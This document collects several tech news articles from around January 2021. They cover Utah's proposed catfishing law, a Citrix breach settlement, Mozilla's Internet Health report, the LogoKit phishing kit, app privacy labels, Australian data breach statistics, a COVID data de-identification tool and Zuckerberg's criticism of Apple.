Information Technology

The State of Utah is considering changes to the law that will make online impersonation a criminal offense. 

As reported by Fox 13, lawmakers in the US state proposed a series of bills this week tackling Internet security and privacy. The main submission, House Bill 80, suggests amendments to existing data privacy laws including an “affirmative defense” for companies caught up in data breaches.
However, House Bill 239, introduced by Rep. Karianne Lisonbee, could be of more relevance to the general public if accepted into law., and could become a blueprint for other states to follow This proposed legislation tackles online impersonation, also known as catfishing, and seeks to make these activities criminal.
Titled, “Online Impersonation Prohibition,” the bill proposes legal consequences for people that “use the name or persona of an individual” without consent. 
This could include creating a fake social media account or website, posting or sending messages, the use of existing photos and information belonging to someone else, and other activities that encourage “reasonable belief” in a recipient that the user is genuine. 
Furthermore, Lisonbee’s bill suggests that catfishing with the “intent to harm or defraud an individual” should not be tolerated. It appears that depending on the severity of the infraction, catfishing could be seen as a misdemeanor — or go up to a third-degree felony. 
The proposed bill is not gunning for anonymous accounts or profiles that create an entirely new person based on stolen photos or fake information. Instead, it focuses on cases where an individual is conducting what could be argued to be a form of identity theft.

This could be in order to harass someone, or in the corporate world, could be applied to when threat actors perform social engineering to impersonate company employees or executives — with the overall goal of obtaining information and conducting further cyberattacks, such as in Business Email Compromise (BEC) campaigns. 
Catfishing takes many forms. In the dating world, this usually means that a fake profile has been created by stealing someone’s photos, and the user masquerades as that person — potentially using a completely different name, location, and more. 
These activities can be nothing more than a response to boredom — as damaging as they can be — or they may be conducted for fraudulent purposes, including financial theft, such as in cases of romance scams. 
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Citrix employees impacted by a data breach that resulted in the theft of their data have secured a $2.275 million settlement. 

The settlement, first agreed in June 2020, has now met with the approval of Judge Ron Altman, as reported by Bloomberg Law. 
This week, the judge issued preliminary approval for the settlement figure in the US District Court for the Southern District of Florida. 
The class-action lawsuit, involving roughly 24,300 members, will be settled in return for Citrix providing the $2.275 million fund, usable for credit monitoring services, ID theft recovery, and up to $15,000 in reimbursement for expenses and loss per claimant. 
Citrix disclosed the data breach in March 2019 after being alerted by the FBI of a possible network intrusion. Cyberattackers had infiltrated the software giant’s internal servers for a period of roughly five months between 2018 and 2019. 
The company said that the threat actors had “intermittent access” to corporate resources and that that password spraying was the likely method in which access to Citrix systems was obtained.
Password spraying takes advantage of weak credentials and is a common method to compromise both corporate and personal accounts.

Citrix employees were embroiled in the security incident. In a letter (.PDF) sent to those thought to be impacted — including staff, contractors, interns, job candidates, beneficiaries, and dependents — the company said their personal data may have been stolen. 
This may have included PII, Social Security numbers, passport numbers, limited health insurance data, driver’s licenses, and financial account information such as payment card numbers. 
A hearing over Zoom is set for June 10, 2021, where the settlement may be finalized. 
ZDNet has reached out to Citrix and will update when we hear back. 
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Racial bias, the spread of misinformation, and anti-worker policies are all eroding the ‘health’ of the Internet with its ecosystem becoming more and more fragmented, researchers say. 

Mozilla’s 2020 Internet Health report, published on Thursday, examines key concerns that could threaten the openness, security, and accessibility of the Internet. 
Now in its fourth year, the research aims to “engage policymakers, businesses, and the public in protecting the Internet as a global resource.”
According to the non-profit, over the course of 2020, the web was besieged with problems related to a “built-in” racial basis that is exacerbating discrimination, and diversification is still an area that needs improvement. 
From artificial intelligence (AI) algorithms that display bias against black and ethnic minority groups to search engine results that display white and US-centric content “by default,” Mozilla says that the Internet landscape “reflects a particular corpus of web content and the context of software developers, managers, and executives of technology companies who are rarely diverse in terms of race, ethnicity or gender.”
In addition, tech giants failing to act transparently contributed to the spread of misinformation — a critical issue when you consider global events such as the spread of COVID-19 and the US election. Anti-vaccine messages, 5G-coronavirus theories, and QAnon conspiracies, to name but a few examples, have run rampant over the past year. 
Apple, Microsoft, Amazon, Google parent company Alphabet, Facebook, Tencent, and Alibaba are cited as the seven major technology companies that predominately control the web, and therefore, have a responsibility to control the stem of misinformation that is reaching unstoppable levels. 

From the beginning of the pandemic until June 2020, a total of 8,105 YouTube videos spreading COVID-19 disinformation accounted for over 20 million shares across social media platforms and 71 million reactions before they were removed.
“The recent shocking events in the US highlighted so clearly how social media platforms can be used as megaphones to incite violence and spread disinformation — something we have seen time and again around the world,” the report says. “Despite years of complaints, there remains a worrying lack of transparency about the platform algorithms, governance and community dynamics at the heart of these models, preventing greater understanding and accountability.”
Mozilla also highlighted the gig economy, and says that this work model — although useful for some who need flexible roles — is “trampling the rights of workers.” 
Made possible through online portals and mobile apps, the pandemic has increased demand for services including food and drink deliveries — but this has come at a cost.
“Delivery drivers and other workers who use apps to find customers are often considered essential workers during the pandemic,” the report says. “Yet these platforms frequently offer unfair and dangerous working conditions.”

Mozilla also suggested that the Internet as we know it is “splintering.” In 2020, every day, somewhere in the world, an Internet shutdown occurred, with India and Chad leading in arbitrary blackouts. 
“The so-called “splinternet” is becoming a reality, with access to large swathes of the internet being increasingly restricted at a country level due to social or political conflict,” the non-profit says. “Censorship, surveillance, and content manipulation are closing off opportunities for people to participate openly and securely online.”
While the Internet landscape last year exposed trends that could erode an open Internet, Mozilla says that improvements are not only possible, but also necessary. Encouraging more diverse pools of talent, rethinking the foundation of systems — from how gig workers are classified in law to how content moderation is performed — questioning technology companies that hold the power to sway online discourse, and developing community-focused alternatives to the online services we use in our daily lives are all ways toward a more open and fair Internet. 
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

A cybercrime group has developed a novel phishing toolkit that changes logos and text on a phishing page in real-time to adapt to targeted victims.
Named LogoKit, this phishing tool is already deployed in the wild, according to threat intelligence firm RiskIQ, which has been tracking its evolution.
The company said it already identified LogoKit installs on more than 300 domains over the past week and more than 700 sites over the past month.
The security firm said LogoKit relies on sending users phishing links that contain their email addresses.
“Once a victim navigates to the URL, LogoKit fetches the company logo from a third-party service, such as Clearbit or Google’s favicon database,” RiskIQ security researcher Adam Castleman said in a report on Wednesday.
“The victim email is also auto-filled into the email or username field, tricking victims into feeling like they have previously logged into the site,” he added.
“Should a victim enter their password, LogoKit performs an AJAX request, sending the target’s email and password to an external source, and, finally, redirecting the user to their [legitimate] corporate web site.”
Image: RiskIQ

Castleman said LogoKit achieves this only with an embeddable set of JavaScript functions” that can be added to any generic login form or complex HTML documents.
This is different from standard phishing kits, most of which need pixel-perfect templates mimicking a company’s authentication pages.
The kit’s modularity allows LogoKit operators to target any company they want with very little customization work and mount tens or hundreds of attacks a week against a wide-ranging set of targets.
RiskIQ said that over the past month, it has seen LogoKit being used to mimic and create login pages for services ranging from generic login portals to false SharePoint portals, Adobe Document Cloud, OneDrive, Office 365, and several cryptocurrency exchanges.
Because LogoKit is so small, the phishing kit doesn’t always need its own complex server setup, as some other phishing kits need. The kit can be hosted on hacked sites or legitimate pages for the companies LogoKit operators want to target.
Furthermore, since LogoKit is a collection of JavaScript files, its resources can also be hosted on public trusted services like Firebase, GitHub, Oracle Cloud, and others, most of which will be whitelisted inside corporate environments and trigger little alerts when loaded inside an employee’s browser.
RiskIQ said its tracking this new threat closely due to the kit’s simplicity, which the security firm believes helps improve its chances of a successful phish. More

Image: Apple
It has been over a month since Apple began publishing privacy summaries in all of its app stores across iOS, iPadOS, macOS, watchOS, and tvOS, with developers now needing to answer a questionnaire as part of submitting an app or update — but there has been one big tech giant-sized exception not providing new information for users, Google.
In a blog post on Wednesday, Google said it would supply information to Apple when its apps are updated.
“As our iOS apps are updated with new features or bug fixes, you’ll see updates to our app page listings that include the new App Privacy Details,” Google Ads group product manager Christophe Combette wrote.
Also due to arrive for users of Apple’s ecosystem is a new app tracking permission prompt appearing when apps want to track users, such as accessing an advertiser identifier (IDFA), which arrived as part of iOS 14.
On this point, Google has not quite worked it all out yet.
“When Apple’s policy goes into effect, we will no longer use information (such as IDFA) that falls under ATT [ App Tracking Transparency] for the handful of our iOS apps that currently use it for advertising purposes. As such, we will not show the ATT prompt on those apps, in line with Apple’s guidance,” Combette said.
“We are working hard to understand and comply with Apple’s guidelines for all of our apps in the App Store.”

Google said the ATT changes, due in the next iOS beta release, will lower the amount of data advertisers can access, such as ad conversion data, and app publishers could see “significant impact” to ad revenue on iOS.
“We’re working with the industry to give Apple feedback on how to further improve SKAdNetwork so advertisers can measure their campaign results accurately on iOS 14,” he said.
“We also encourage advertisers to monitor the performance and delivery of all iOS App campaigns closely and, if necessary, make adjustments to budgets and bids to achieve their goals.”
On Thursday, Apple took a swipe at the ad industry with its A Day in the Life of your Data report, which said apps, on average, had six trackers from other companies that “have the sole purpose of collecting and tracking people and their personal information”, and the industry collects $227 billion in revenue each year.
“Privacy means peace of mind, it means security, and it means you are in the driver’s seat when it comes to your own data,” Apple senior vice president of software engineering Craig Federighi said in a statement.
“Our goal is to create technology that keeps people’s information safe and protected. We believe privacy is a fundamental human right, and our teams work every day to embed it in everything we make.”
Earlier on Thursday, the Australian Competition and Consumer Commission added to its list of historically questionable decisions by proposing Australia adopt a common transaction ID.
“Industry should implement a common system whereby each transaction in the ad tech supply chain is identified with a single identifier which allows a single transaction to be traced through the entire supply chain. This should be done in a way that protects the privacy of consumers,” it wrote.
Related Coverage More

Australian entities covered by the Privacy Act reported 519 instances of data breaches in the six months to December 2020, a 5% increase from the first half of the year.
Data breach notification to the Office of the Australian Information Commissioner (OAIC) became mandatory under the Notifiable Data Breaches (NDB) scheme in February 2018.
Need to disclose a breach? Read this: Notifiable Data Breaches scheme: Getting ready to disclose a data breach in Australia
Since the mandate, health has been the most affected sector; the latest report [PDF] shows no change, with health accounting for 123 notifications, followed by finance with 83 notifications. The Australian government entered the top five sectors for the first time, accounting for 6% of the total, with 33 notifications.
The Privacy Act 1988 covers most Australian government agencies; it does not cover a number of intelligence and national security agencies, nor does it cover state and local government agencies, public hospitals, and public schools.
Delving deeper on the government faux pas, human error was to blame for 29 of the sector’s total notifications, two stemmed from a malicious or criminal attack, one was attributed to a “cyber incident”, and the remaining one to social engineering/impersonation.
The “cyber incident” was confirmed as a brute-force attack on the unnamed entity.

The most common type of human error to blame for the government’s notifications was personal information being sent to the wrong recipient. Failure to redact was to blame for five notifications.
In total, malicious or criminal attacks, including cyber incidents, remained the leading source of data breaches, accounting for 58% of all notifications — 310 breaches. Data breaches resulting from human error accounted for 38% of notifications, at 204. System faults accounted for the remaining 25 breaches notified.
“While it is possible that this increase is linked to changed business and information handling practices resulting from remote working arrangements, the OAIC is yet to identify any information or incidents that conclusively prove a link,” the office said, pointing to COVID-19 stay at home measures and the uptick of human error-related breaches.
91% of data breaches notified under the NDB scheme from July to December 2020 involved contact information, such as an individual’s home address, phone number, or email address.
Data breaches resulting from social engineering or impersonation accounted for 34 notifications. Actions taken by a rogue employee or insider threat accounted for 35 notifications, up from 23, and theft of paperwork or storage devices resulted in 29 notifications.
23% of all notifications received by the OAIC involved malicious actors gaining access to accounts using compromised or stolen credentials, with the most common method email-based phishing.
“This confirms that email-based vulnerability is one of the greatest risks to information security facing organisations,” the report says. “The human factor is an important element in an organisation’s overall information and cybersecurity posture, given these attacks rely on a person clicking on a phishing link.”
68% of data breaches affected 100 individuals or fewer, but one of the notifications affected over 10 million individuals.
August saw 208 notifications made, and November only 62.
The OAIC also said it received a number of notifications during the reporting period that involved a managed service provider (MSP) hosting or holding data on behalf of one or more other entities.
RELATED COVERAGE More

The New South Wales government has been using a tool to help de-identify data related to COVID-19 prior to the release of that data to the public, the CSIRO said on Thursday.
The tool, dubbed Personal Information Factor (PIF), has been created by Data61, the NSW government, the Australian Computer Society, Cyber Security Cooperative Research Centre (CSCRC), and “several other groups”.
“The privacy tool assesses the risks to an individual’s data within any dataset; allowing targeted and effective protection mechanisms to be put in place,” the CSIRO claimed.
“The software uses a sophisticated data analytics algorithm to identify the risks that sensitive, de-identified and personal information within a dataset can be re-identified and matched to its owner.”
NSW chief data scientist Dr Ian Oppermann said the tool was being used on datasets containing data on people who had been infected with COVID-19 before it was made publicly available.
“Given the very strong community interest in growing COVID-19 cases, we needed to release critical and timely information at a fine-grained level detailing when and where COVID-19 cases were identified,” Oppermann said.
“This also included information such as the likely cause of infection and, earlier in the pandemic, the age range of people confirmed to be infected.

“We wanted the data to be as detailed and granular as possible, but we also needed to protect the privacy and identity of the individuals associated with those datasets.”
Data61 said PIF assigns a risk score to a dataset and makes recommendations to make de-identification “more secure and safe”.
The tool is also being used on other datasets such as domestic violence data and public transport usage, Data61 said.
PIF will be made available by June 22.
In a recent submission to a review of the Privacy Act, security researcher Vanessa Teague said de-identification does not work.
“A person’s detailed individual record cannot be adequately de-identified or anonymised, and should not be sold, shared, or published without the person’s explicit, genuine, informed consent,” Teague said.
“Identifiable personal information should be protected exactly like all other personal information, even if an attempt to de-identify it was made.”
At the end of 2017, a team of academics, including Teague, were able to re-identify some of the data from a set containing historic longitudinal medical billing records on one-tenth of all Australians.
“We found that patients can be re-identified, without decryption, through a process of linking the unencrypted parts of the record with known information about the individual such as medical procedures and year of birth,” Dr Chris Culnane said at the time.
“This shows the surprising ease with which de-identification can fail, highlighting the risky balance between data sharing and privacy.”
In September 2016, the same dataset was found by the University of Melbourne team to not be encrypting supplier codes properly. The dataset was subsequently pulled down by the Department of Health.
“Leaving out some of the algorithmic details didn’t keep the data secure ­– if we can reverse-engineer the details in a few days, then there is a risk that others could do so too,” the team said at the time.
“Security through obscurity doesn’t work — keeping the algorithm secret wouldn’t have made the encryption secure, it just would have taken longer for security researchers to identify the problem.
“It is much better for such problems to be found and addressed than to remain unnoticed.”
In response, the Australian government sought to criminalise the intentional re-identification and disclosure of de-identified Commonwealth datasets and reverse the onus of proof, with the aim of applying the changes retrospectively from 29 September 2016.
The changes lapsed at the 2019 election.

Coronavirus More

Facebook’s fourth quarter earnings conference call featured CEO Mark Zuckerberg calling out Apple’s iOS 14 moves, saying the iPhone maker was “one of our biggest competitors” and questioning motives.
Yes folks, Facebook’s Zuckerberg went a little pro wrestling (at least for tech CEOs not named Larry Ellison) with its Apple confrontation.
Zuckerberg has a reason to be a bit bent out of shape. Facebook said its future results could be hurt by privacy changes in Apple’s iOS 14. Zuckerberg argued that Apple’s changes are aimed at benefiting iMessage and harm small businesses.
Here are Zuckerberg’s comments in full:

WhatsApp, and the direction that we’re heading in with Messenger, are the best private social apps available. Now we have a lot of competitors who make claims about privacy that are often misleading. Now Apple recently released so-called nutrition labels, which focused largely on metadata that apps collect rather than the privacy and security of people’s actual messages. But iMessage stores non-intending encrypted backups of your messages by default unless you disable iCloud. So Apple and governments have the ability to access most people’s messages. So when it comes to what matters most, protecting people’s messages, I think that WhatsApp is clearly superior. Now since I try to use these earnings calls to discuss aspects of business strategy that I think are important for investors to understand, I do want to highlight that we increasingly see Apple as one of our biggest competitors. iMessage is a key linchpin of their ecosystem. It comes pre-installed on every iPhone, and they preference it with private APIs and permissions, which is why iMessage is the most used messaging service in the U.S. And now we are also seeing apples business depend more and more on gaining share in apps and services against us and other developers. So Apple has every incentive to use their dominant platform position to interfere with how our apps and other apps work, which they regularly do to preference their own. And this impacts the growth of millions of businesses around the world including with the upcoming iOS 14 changes, many small businesses will no longer be able to reach their customers with targeted ads. Now Apple may say that they’re doing this to help people, but the moves clearly track their competitive interests. And I think that this dynamic is important for people to understand because we and others are going to be up against this for the foreseeable future. Now our messaging services continue growing, but it is an uphill battle, and our services just need to be that much better as private social platforms to succeed.

Facebook operating chief Sheryl Sandberg noted that Facebook will find ways to amplify stories about small businesses worried about Apple’s iOS changes.
Related:
Apple CEO Tim Cook didn’t address Facebook by name but did stick to the company’s pitch on privacy. Cook said:

Tomorrow is International Privacy Day, and we continue to set new standards to protect users’ right to privacy, not just for our own products but to be the ripple in the pond that moves the whole industry forward. Most recently, we’re in the process of deploying new requirements across the App Store ecosystem that give users more knowledge about and new tools to control the ways that apps gather and share their personal data. More